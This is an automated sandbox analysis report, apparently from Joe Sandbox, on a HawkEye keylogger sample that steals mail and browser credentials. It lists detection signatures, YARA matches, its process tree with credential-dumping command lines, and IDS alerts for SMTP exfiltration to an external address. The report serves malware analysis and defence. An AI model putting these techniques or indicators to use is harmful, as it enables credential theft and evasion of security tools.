Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report INQUIRY.exe

Overview

General Information

Sample Name:INQUIRY.exe
Analysis ID:319686
MD5:0b940145d7d02e5b1b975c99dd5197a4
SHA1:53ae0b576f7b362b90a25ace1470d33068db4490
SHA256:bf487ff7cdbbd998b633b1858a939d8c808bcce65ab9937695475b39deea70a8
Tags:exeHawkEye

Most interesting Screenshot:

Detection

HawkEye MailPassView
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected HawkEye Rat
Detected unpacking (changes PE section rights)
Detected unpacking (creates a PE file in dynamic memory)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected HawkEye Keylogger
Yara detected MailPassView
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Allocates memory in foreign processes
Changes the view of files in windows explorer (hidden files and folders)
Contains functionality to detect sleep reduction / modifications
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for sample
Maps a DLL or memory area into another process
May check the online IP address of the machine
Sample uses process hollowing technique
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
AV process strings found (often used to terminate AV products)
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains strange resources
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores large binary data to the registry
Tries to load missing DLLs
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Startup

  • System is w10x64
  • INQUIRY.exe (PID: 2016 cmdline: 'C:\Users\user\Desktop\INQUIRY.exe' MD5: 0B940145D7D02E5B1B975C99DD5197A4)
    • INQUIRY.exe (PID: 5896 cmdline: 'C:\Users\user\Desktop\INQUIRY.exe' MD5: 0B940145D7D02E5B1B975C99DD5197A4)
      • dw20.exe (PID: 6868 cmdline: dw20.exe -x -s 2308 MD5: 8D10DA8A3E11747E51F23C882C22BBC3)
      • vbc.exe (PID: 6664 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
      • vbc.exe (PID: 6700 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
      • WerFault.exe (PID: 6776 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5896 -s 2216 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • INQUIRY.exe (PID: 5788 cmdline: 'C:\Users\user\Desktop\INQUIRY.exe' 2 5896 5358953 MD5: 0B940145D7D02E5B1B975C99DD5197A4)
      • INQUIRY.exe (PID: 6076 cmdline: C:\Users\user\Desktop\INQUIRY.exe MD5: 0B940145D7D02E5B1B975C99DD5197A4)
        • INQUIRY.exe (PID: 6808 cmdline: C:\Users\user\Desktop\INQUIRY.exe MD5: 0B940145D7D02E5B1B975C99DD5197A4)
          • dw20.exe (PID: 6936 cmdline: dw20.exe -x -s 2272 MD5: 8D10DA8A3E11747E51F23C882C22BBC3)
          • vbc.exe (PID: 5684 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
          • vbc.exe (PID: 4184 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
          • WerFault.exe (PID: 1076 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6808 -s 2324 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
        • INQUIRY.exe (PID: 6792 cmdline: 'C:\Users\user\Desktop\INQUIRY.exe' 2 6808 5404546 MD5: 0B940145D7D02E5B1B975C99DD5197A4)
          • INQUIRY.exe (PID: 6400 cmdline: C:\Users\user\Desktop\INQUIRY.exe MD5: 0B940145D7D02E5B1B975C99DD5197A4)
            • INQUIRY.exe (PID: 240 cmdline: C:\Users\user\Desktop\INQUIRY.exe MD5: 0B940145D7D02E5B1B975C99DD5197A4)
              • dw20.exe (PID: 204 cmdline: dw20.exe -x -s 2100 MD5: 8D10DA8A3E11747E51F23C882C22BBC3)
            • INQUIRY.exe (PID: 6428 cmdline: 'C:\Users\user\Desktop\INQUIRY.exe' 2 240 5445406 MD5: 0B940145D7D02E5B1B975C99DD5197A4)
              • INQUIRY.exe (PID: 6900 cmdline: C:\Users\user\Desktop\INQUIRY.exe MD5: 0B940145D7D02E5B1B975C99DD5197A4)
                • INQUIRY.exe (PID: 1364 cmdline: C:\Users\user\Desktop\INQUIRY.exe MD5: 0B940145D7D02E5B1B975C99DD5197A4)
                  • dw20.exe (PID: 6380 cmdline: dw20.exe -x -s 2284 MD5: 8D10DA8A3E11747E51F23C882C22BBC3)
                  • vbc.exe (PID: 5396 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
                  • vbc.exe (PID: 3064 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
                  • WerFault.exe (PID: 7076 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1364 -s 2096 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
                • INQUIRY.exe (PID: 4424 cmdline: 'C:\Users\user\Desktop\INQUIRY.exe' 2 1364 5460187 MD5: 0B940145D7D02E5B1B975C99DD5197A4)
  • cleanup

Malware Configuration

Threatname: HawkEye

{"Modules": ["WebBrowserPassView"], "Version": ""}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmpRAT_HawkEyeDetects HawkEye RATKevin Breen <kevin@techanarchy.net>
  • 0x59d3e3:$key: HawkEyeKeylogger
  • 0x59f613:$salt: 099u787978786
  • 0x59da24:$string1: HawkEye_Keylogger
  • 0x59e863:$string1: HawkEye_Keylogger
  • 0x59f573:$string1: HawkEye_Keylogger
  • 0x59ddf9:$string2: holdermail.txt
  • 0x59de19:$string2: holdermail.txt
  • 0x59dd3b:$string3: wallet.dat
  • 0x59dd53:$string3: wallet.dat
  • 0x59dd69:$string3: wallet.dat
  • 0x59f137:$string4: Keylog Records
  • 0x59f44f:$string4: Keylog Records
  • 0x59f66b:$string5: do not script -->
  • 0x59d3cb:$string6: \pidloc.txt
  • 0x59d459:$string7: BSPLIT
  • 0x59d469:$string7: BSPLIT
C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmpJoeSecurity_HawkEyeYara detected HawkEye KeyloggerJoe Security
    C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmpHawkeyedetect HawkEye in memoryJPCERT/CC Incident Response Group
    • 0x59da7c:$hawkstr1: HawkEye Keylogger
    • 0x59e8a9:$hawkstr1: HawkEye Keylogger
    • 0x59ebd8:$hawkstr1: HawkEye Keylogger
    • 0x59ed33:$hawkstr1: HawkEye Keylogger
    • 0x59ee96:$hawkstr1: HawkEye Keylogger
    • 0x59f10f:$hawkstr1: HawkEye Keylogger
    • 0x59d60a:$hawkstr2: Dear HawkEye Customers!
    • 0x59ec2b:$hawkstr2: Dear HawkEye Customers!
    • 0x59ed82:$hawkstr2: Dear HawkEye Customers!
    • 0x59eee9:$hawkstr2: Dear HawkEye Customers!
    • 0x59d72b:$hawkstr3: HawkEye Logger Details:
    C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmpRAT_HawkEyeDetects HawkEye RATKevin Breen <kevin@techanarchy.net>
    • 0x5a504d:$key: HawkEyeKeylogger
    • 0x5a727d:$salt: 099u787978786
    • 0x5a568e:$string1: HawkEye_Keylogger
    • 0x5a64cd:$string1: HawkEye_Keylogger
    • 0x5a71dd:$string1: HawkEye_Keylogger
    • 0x5a5a63:$string2: holdermail.txt
    • 0x5a5a83:$string2: holdermail.txt
    • 0x5a59a5:$string3: wallet.dat
    • 0x5a59bd:$string3: wallet.dat
    • 0x5a59d3:$string3: wallet.dat
    • 0x5a6da1:$string4: Keylog Records
    • 0x5a70b9:$string4: Keylog Records
    • 0x5a72d5:$string5: do not script -->
    • 0x5a5035:$string6: \pidloc.txt
    • 0x5a50c3:$string7: BSPLIT
    • 0x5a50d3:$string7: BSPLIT
    C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmpJoeSecurity_HawkEyeYara detected HawkEye KeyloggerJoe Security
      Click to see the 4 entries

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpRAT_HawkEyeDetects HawkEye RATKevin Breen <kevin@techanarchy.net>
      • 0x7b89c:$key: HawkEyeKeylogger
      • 0x7dacc:$salt: 099u787978786
      • 0x7bedd:$string1: HawkEye_Keylogger
      • 0x7cd1c:$string1: HawkEye_Keylogger
      • 0x7da2c:$string1: HawkEye_Keylogger
      • 0x7c2b2:$string2: holdermail.txt
      • 0x7c2d2:$string2: holdermail.txt
      • 0x7c1f4:$string3: wallet.dat
      • 0x7c20c:$string3: wallet.dat
      • 0x7c222:$string3: wallet.dat
      • 0x7d5f0:$string4: Keylog Records
      • 0x7d908:$string4: Keylog Records
      • 0x7db24:$string5: do not script -->
      • 0x7b884:$string6: \pidloc.txt
      • 0x7b912:$string7: BSPLIT
      • 0x7b922:$string7: BSPLIT
      00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
        00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpJoeSecurity_HawkEyeYara detected HawkEye KeyloggerJoe Security
          00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
            00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpHawkeyedetect HawkEye in memoryJPCERT/CC Incident Response Group
            • 0x7bf35:$hawkstr1: HawkEye Keylogger
            • 0x7cd62:$hawkstr1: HawkEye Keylogger
            • 0x7d091:$hawkstr1: HawkEye Keylogger
            • 0x7d1ec:$hawkstr1: HawkEye Keylogger
            • 0x7d34f:$hawkstr1: HawkEye Keylogger
            • 0x7d5c8:$hawkstr1: HawkEye Keylogger
            • 0x7bac3:$hawkstr2: Dear HawkEye Customers!
            • 0x7d0e4:$hawkstr2: Dear HawkEye Customers!
            • 0x7d23b:$hawkstr2: Dear HawkEye Customers!
            • 0x7d3a2:$hawkstr2: Dear HawkEye Customers!
            • 0x7bbe4:$hawkstr3: HawkEye Logger Details:
            Click to see the 197 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            5.2.vbc.exe.400000.0.unpackJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
              16.1.INQUIRY.exe.400000.0.unpackRAT_HawkEyeDetects HawkEye RATKevin Breen <kevin@techanarchy.net>
              • 0x112984:$key: HawkEyeKeylogger
              • 0x114bb4:$salt: 099u787978786
              • 0x112fc5:$string1: HawkEye_Keylogger
              • 0x113e04:$string1: HawkEye_Keylogger
              • 0x114b14:$string1: HawkEye_Keylogger
              • 0x11339a:$string2: holdermail.txt
              • 0x1133ba:$string2: holdermail.txt
              • 0x1132dc:$string3: wallet.dat
              • 0x1132f4:$string3: wallet.dat
              • 0x11330a:$string3: wallet.dat
              • 0x1146d8:$string4: Keylog Records
              • 0x1149f0:$string4: Keylog Records
              • 0x114c0c:$string5: do not script -->
              • 0x11296c:$string6: \pidloc.txt
              • 0x1129fa:$string7: BSPLIT
              • 0x112a0a:$string7: BSPLIT
              16.1.INQUIRY.exe.400000.0.unpackJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
                16.1.INQUIRY.exe.400000.0.unpackJoeSecurity_HawkEyeYara detected HawkEye KeyloggerJoe Security
                  16.1.INQUIRY.exe.400000.0.unpackJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
                    Click to see the 156 entries

                    Sigma Overview

                    No Sigma rule has matched

                    Signature Overview

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection:

                    barindex
                    Found malware configurationShow sources
                    Source: vbc.exe.6700.6.memstrMalware Configuration Extractor: HawkEye {"Modules": ["WebBrowserPassView"], "Version": ""}
                    Source: vbc.exe.6700.6.memstrMalware Configuration Extractor: HawkEye {"Modules": ["WebBrowserPassView"], "Version": ""}
                    Multi AV Scanner detection for submitted fileShow sources
                    Source: INQUIRY.exeVirustotal: Detection: 43%Perma Link
                    Source: INQUIRY.exeReversingLabs: Detection: 41%
                    Source: INQUIRY.exeVirustotal: Detection: 43%Perma Link
                    Source: INQUIRY.exeReversingLabs: Detection: 41%
                    Machine Learning detection for sampleShow sources
                    Source: INQUIRY.exeJoe Sandbox ML: detected
                    Source: INQUIRY.exeJoe Sandbox ML: detected
                    Source: 16.2.INQUIRY.exe.22e0000.1.unpackAvira: Label: TR/Inject.vcoldi
                    Source: 32.2.INQUIRY.exe.2680000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 32.2.INQUIRY.exe.2680000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 1.2.INQUIRY.exe.21e0000.1.unpackAvira: Label: TR/Inject.vcoldi
                    Source: 1.2.INQUIRY.exe.2270000.2.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 1.2.INQUIRY.exe.2270000.2.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 16.2.INQUIRY.exe.2370000.2.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 16.2.INQUIRY.exe.2370000.2.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 0.2.INQUIRY.exe.2640000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 0.2.INQUIRY.exe.2640000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 27.2.INQUIRY.exe.2640000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 27.2.INQUIRY.exe.2640000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 33.2.INQUIRY.exe.400000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 33.2.INQUIRY.exe.400000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 0.2.INQUIRY.exe.25f0000.2.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 33.2.INQUIRY.exe.22f0000.2.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 33.2.INQUIRY.exe.22f0000.2.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 1.2.INQUIRY.exe.2300000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 1.2.INQUIRY.exe.2300000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 16.2.INQUIRY.exe.2490000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 16.2.INQUIRY.exe.2490000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 33.2.INQUIRY.exe.2210000.1.unpackAvira: Label: TR/Inject.vcoldi
                    Source: 28.2.INQUIRY.exe.400000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 28.2.INQUIRY.exe.400000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 13.2.INQUIRY.exe.2660000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 13.2.INQUIRY.exe.2660000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 33.2.INQUIRY.exe.2380000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 33.2.INQUIRY.exe.2380000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 32.2.INQUIRY.exe.2630000.2.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 28.2.INQUIRY.exe.7a0000.1.unpackAvira: Label: TR/Inject.vcoldi
                    Source: 16.2.INQUIRY.exe.400000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 16.2.INQUIRY.exe.400000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 27.2.INQUIRY.exe.25e0000.2.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 28.2.INQUIRY.exe.2240000.2.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 28.2.INQUIRY.exe.2240000.2.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 1.2.INQUIRY.exe.400000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 1.2.INQUIRY.exe.400000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 16.2.INQUIRY.exe.22e0000.1.unpackAvira: Label: TR/Inject.vcoldi
                    Source: 32.2.INQUIRY.exe.2680000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 32.2.INQUIRY.exe.2680000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 1.2.INQUIRY.exe.21e0000.1.unpackAvira: Label: TR/Inject.vcoldi
                    Source: 1.2.INQUIRY.exe.2270000.2.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 1.2.INQUIRY.exe.2270000.2.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 16.2.INQUIRY.exe.2370000.2.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 16.2.INQUIRY.exe.2370000.2.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 0.2.INQUIRY.exe.2640000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 0.2.INQUIRY.exe.2640000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 27.2.INQUIRY.exe.2640000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 27.2.INQUIRY.exe.2640000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 33.2.INQUIRY.exe.400000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 33.2.INQUIRY.exe.400000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 0.2.INQUIRY.exe.25f0000.2.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 33.2.INQUIRY.exe.22f0000.2.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 33.2.INQUIRY.exe.22f0000.2.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 1.2.INQUIRY.exe.2300000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 1.2.INQUIRY.exe.2300000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 16.2.INQUIRY.exe.2490000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 16.2.INQUIRY.exe.2490000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 33.2.INQUIRY.exe.2210000.1.unpackAvira: Label: TR/Inject.vcoldi
                    Source: 28.2.INQUIRY.exe.400000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 28.2.INQUIRY.exe.400000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 13.2.INQUIRY.exe.2660000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 13.2.INQUIRY.exe.2660000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 33.2.INQUIRY.exe.2380000.3.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 33.2.INQUIRY.exe.2380000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 32.2.INQUIRY.exe.2630000.2.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 28.2.INQUIRY.exe.7a0000.1.unpackAvira: Label: TR/Inject.vcoldi
                    Source: 16.2.INQUIRY.exe.400000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 16.2.INQUIRY.exe.400000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 27.2.INQUIRY.exe.25e0000.2.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 28.2.INQUIRY.exe.2240000.2.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 28.2.INQUIRY.exe.2240000.2.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 1.2.INQUIRY.exe.400000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                    Source: 1.2.INQUIRY.exe.400000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmpBinary or memory string: autorun.inf
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmpBinary or memory string: [autorun]
                    Source: INQUIRY.exeBinary or memory string: [autorun]
                    Source: INQUIRY.exeBinary or memory string: autorun.inf
                    Source: WerFault.exe, 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmpBinary or memory string: autorun.inf
                    Source: WerFault.exe, 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmpBinary or memory string: [autorun]
                    Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmpBinary or memory string: autorun.inf
                    Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmpBinary or memory string: [autorun]
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpBinary or memory string: autorun.inf
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpBinary or memory string: [autorun]
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmpBinary or memory string: autorun.inf
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmpBinary or memory string: [autorun]
                    Source: INQUIRY.exeBinary or memory string: [autorun]
                    Source: INQUIRY.exeBinary or memory string: autorun.inf
                    Source: WerFault.exe, 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmpBinary or memory string: autorun.inf
                    Source: WerFault.exe, 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmpBinary or memory string: [autorun]
                    Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmpBinary or memory string: autorun.inf
                    Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmpBinary or memory string: [autorun]
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpBinary or memory string: autorun.inf
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpBinary or memory string: [autorun]
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004089B8 FindFirstFileA,GetLastError,0_2_004089B8
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00405AE8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,0_2_00405AE8
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004089B8 FindFirstFileA,GetLastError,0_2_004089B8
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00405AE8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,0_2_00405AE8
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_004089B8 FindFirstFileA,GetLastError,2_2_004089B8
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_00405AE8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,2_2_00405AE8
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 5_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,5_2_00406EC3
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen,6_2_00408441
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00407E0E FindFirstFileW,FindNextFileW,FindClose,6_2_00407E0E

                    Networking:

                    barindex
                    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                    Source: TrafficSnort IDS: 2019926 ET TROJAN HawkEye Keylogger Report SMTP 192.168.2.4:49750 -> 166.62.27.57:587
                    Source: TrafficSnort IDS: 2019926 ET TROJAN HawkEye Keylogger Report SMTP 192.168.2.4:49774 -> 166.62.27.57:587
                    Source: TrafficSnort IDS: 2019926 ET TROJAN HawkEye Keylogger Report SMTP 192.168.2.4:49750 -> 166.62.27.57:587
                    Source: TrafficSnort IDS: 2019926 ET TROJAN HawkEye Keylogger Report SMTP 192.168.2.4:49774 -> 166.62.27.57:587
                    May check the online IP address of the machineShow sources
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
